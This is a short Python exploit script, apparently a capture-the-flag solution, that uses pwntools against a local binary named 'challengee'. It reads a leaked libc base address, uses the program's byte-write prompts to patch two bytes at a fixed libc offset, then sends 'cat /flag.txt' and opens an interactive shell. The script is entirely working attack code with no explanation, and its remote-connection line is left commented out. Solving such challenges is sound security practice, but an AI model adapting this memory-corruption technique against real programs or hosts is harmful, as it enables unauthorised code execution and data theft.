#!/usr/bin/python3
# p = remote(IP, PORT)
from pwn import *
p = process("./challengee")

def setbyte(address: int, byte: int):
    p.sendlineafter(b'wish?', hex(address).encode())
    p.sendlineafter(b'here?', hex(byte).encode())

libc_base = p.recvline_contains(b'libc.so.6')

libc = int(libc_base.decode().split('-')[0], 16)
log.info(f"")
# success(f'{libc=:x}')

offset = 0x7ffff7c47a21 - 0x7ffff7c00000
# libc = 0x7ffff7c00000
# setbyte(0x7ffff7c47a21+1, 0xa8)
# setbyte(0x7ffff7c47a21+2, 0x7a)
setbyte(libc + offset + 1, 0x05)
setbyte(libc + offset + 2, 0x7b)

p.sendline(b'cat /flag.txt')
p.interactive()
